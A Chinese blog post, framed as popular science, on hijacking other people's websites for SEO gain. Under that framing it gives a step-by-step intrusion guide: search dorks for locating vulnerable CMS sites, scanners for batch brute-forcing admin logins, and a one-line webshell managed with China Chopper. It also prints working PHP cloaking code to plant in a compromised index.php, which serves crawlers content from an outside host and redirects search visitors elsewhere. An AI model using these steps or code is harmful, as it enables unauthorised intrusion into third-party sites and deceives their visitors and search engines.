瓜瓜只是科普

并不想教坏你们。。。

看到标题的时候，不知道你们什么感觉，是不是觉得麻瓜君一直在带坏你们，把你们引入黑暗的深渊呢？

我们的目的只是为了科普，探索我们不知道的东西而已，当然还是进入科普环节。。。

在互联网的世界里，其实流量劫持并不是什么件新鲜事。所谓流量劫持，无非就是指通过一定技术手段，控制你们的上网行为，让你们打开不想打开的网页，看到不想看的广告，当你们打开了之后，你们的行为就会给劫持者带去源源不断的收入。

什么意思呢？很简单。。。

明明打开的是www.magua12138.com网站，莫名其妙却被跳转至www.fzeme.com的网站；明明想下的是A软件，下载安装后却发现是B软件；还有打开一个App，弹出让人心乱如麻的广告，你们以为电脑手机中毒了？

我就呵呵了，错！或许你们真的错怪了病毒，因为这个时候你们的互联网流量很可能被劫持了。

尽管这种现象很早就存在，也有很多人杜绝或者厌恶，但在“用户就是小绵羊”的环境下，流量劫持始终“野火烧不尽，春风吹又生”。

到底谁在劫持流量？

流量劫持背后的“恶魔之手”究竟什么样？

根据《IT时报》记者调查发现，在互联网世界，流量劫持背后有一个庞大的灰色产业链，仅DNS劫持一种方式，每天被恶意劫持的流量至少有上千万个IP。

今天我们话题就围绕着“劫持”两个字，随便扯一扯。。。

劫持其实有很多，比如说什么，流量劫持、快照劫持、PR劫持等，其实前几个步骤都一样，就是最后的脚本不同而已。。。

我们按顺序来，因为是劫持别人的站，所以我们要做的第一步肯定是获取劫持站的后台权限，并留下后门，以便日后管理，这个过程就是常说的拿站（webshell）。

从难易度来说，最容易的就是企业站了，因为大多数的企业站都是采用开源系统，很多系统因本身的问题存在诸多安全隐患，比如虐心的dede（我们常用的织梦CMS）。

有些系统的漏洞已经曝光出来，找到这些漏洞的特征和这个漏洞对应的系统，然后去各种渠道搜集使用这个系统的网站，遍历扫描每个站，如果存在这个漏洞，就暴力破解后台账户名和密码。

收集目标网站，最简单的方法是拿漏洞的特征做关键词到搜索引擎去搜，然后把搜索结果页上的网站全部抓下来。熟悉网站的瓜友肯定对下面的关键词非常熟悉了比如说：

Powered by DEDECMS

inurl:HomeMarket.asp

有限公司--Powered by ASPCMS V2.0

用户登陆 inurl:admin/login.asp。。。还有XXX技术支持等等

然后拿抓下来以后就可以对这些网站去进行漏洞了，你们肯定一脸懵逼，是不是想问怎么扫描？

用很多现成的拿站工具可以完成批量的扫描和破解，然而每个工具不能能覆盖所有漏洞，所以需要交叉使用：

御剑后台扫描

wwwscan GUI版

web扫描工具-WVS

椰树WEB漏洞扫描器

Pker多线程后台极速扫描器

Web应用安全漏洞检测工具

Acunetix Web Vulnerability Scanner 8

如果过程顺利的话，就可以拿到一些网站的后台账户跟密码了，然后就可以正常登陆了。

这个时候你们就需要留一个后门，在网站后台新建一个php文件（用DW），写入一句话木马：

，通过菜刀（一个非常好用而又强大的webshell管理软件，如“中国菜刀”）添加shell，无异常的话就已经顺利的拿下一个站了。、

接下来在后台写入劫持代码，比如要劫持首页，在后台找一个很隐蔽的地方新建一个php文件，写入类似的代码：

$httpuser=strtolower($_SERVER['HTTP_USER_AGENT']);

if(strstr($httpuser,'Baiduspider') or strstr($httpuser,'Googlebot') or strstr($httpuser,'Sogou web spider')){

$url=‘http://www.magua121381.com';$a=file_get_contents($url);echo $a;exit;

}

$httpuser=strtolower($_SERVER['HTTP_REFERER']);

if(strstr($httpuser,'baidu') or strstr($httpuser,'google') or strstr($httpuser,'sogou')){

$url=‘http://www.magua121382.com';header("Location:$url");exit;

}

?>

我们怎么去理解这句话呢？意思其实非常简单，大致可以这么理解，若蜘蛛来访，则抓取 www.magua121381.com的内容；若来路为搜索引擎，则返回www.magua121382.com的内容，然后上传到网站的根目录。。。

之后在首页文件index.php中调用刚才新建的文件：

include(“{新建文件的路径}")

?>

当然，www.magua121381.com 和 www.magua121382.com 可以设为同一个网址。（如果你们真这么设置，你们做那么多的目的是什么= =）

这就是快照劫持的简单步骤了，被劫持的站，对蜘蛛访问返回www.magua121381.com的内容，对从搜索引擎搜索过来的用户返回www.magua121382.com的内容，你如果输入网站的域名（网站url），则是本来的页面。一般负责网站管理的人，都只输入url访问网站，index.php也很少关注，所以好长时间才发现，甚至发现不了自己的网站被劫持。

有的时候在百度中搜索很多违禁的词语，会出现一堆政府的网站，但是点进去是却看到各种违禁内容（百度站长平台还专门开了一个“bad case”的帖子专门收集类似的案例），直接输入网址访问，却是正常的内容，若果换一个搜索词从百度点进去，还是正常的内容。这就是在刚才所说的劫持代码的基础上完成的，根据referer词来判断是否返回指定页面，现在百度已经取消referer参数了，所以这东西也就随之失效了，我们略过。。。

进入下一个环节，PR劫持，就是对蜘蛛301到指定的网站，（301就不特别解释了，301重定向的意思，自己上网查一下）从而提升权重。有些新站，做了不到1个月，用站长工具一查，哎哟我去，权重值都在4以上，但网站本身并没多少内容和收录，如果有看到这样的情况，基本是用了PR劫持了。。。

简单来说，PR值的计算是有周期的，假如A网站的PR值是4，B网站是0，我们把A网站劫持到B网站，在PR值计算过后，在取消劫持，那么B网站就拥有了4的PR值，至少能保持到下次计算的时候。。。

最后说一个快照劫持，因为最近看见的比较频繁且很少人知道，利用JS脚本来霸屏搜索引擎。。。

怎么做到的？脚本怎么写？

这样改变世界的做法你们真的认为很容易就能实现吗？

事实上的确很容易。。。用一些软件就可以了。

我们来看看这个软件的搜索跳转功能，支持各大搜索引擎，使从任意方式搜索出点击到你网站后，搜索网站页面自动跳转到指定的网站，自定义网站功能支持一级，多级，长尾域名格式。优化来路，默认百度，防止百度蜘蛛被k。

这软件还有一些奇特的功能，看图不说话。。。

手机也是可以的。。。

这个软件还真是丧心病狂阿。。。

建议很多玩搜索方面的瓜友如果是因为好奇，可以跟着麻瓜君的思路探索一下，但是如果是为了自己的公司，或者是自己所在的企业长远的考虑，建议不要运用以上任何一种手法，到时候别说我没提醒你们哦。

今天我们仅仅科普下劫持原理，还有很多的细节没有展开说，比如批量管理webshell，又比如说如何隐蔽踪迹。

如果藏的不是非常隐蔽，基本都会被发现，只是时间长短问题，且作上去的排名都活不了太长时间，而且会带来你意想不到的惩罚，说白了，能获得多大效果，取决于能铺多少量，是个耗费精力、时间的力气活，所以还是专心研究白帽SEO吧。。。

▼

若要转载麻瓜君的文章

记得请署名噢...

投稿邮箱：

ceo@magua12138.com

关注微信公众号

magua12139

更多内容请登录：

www.magua12138.com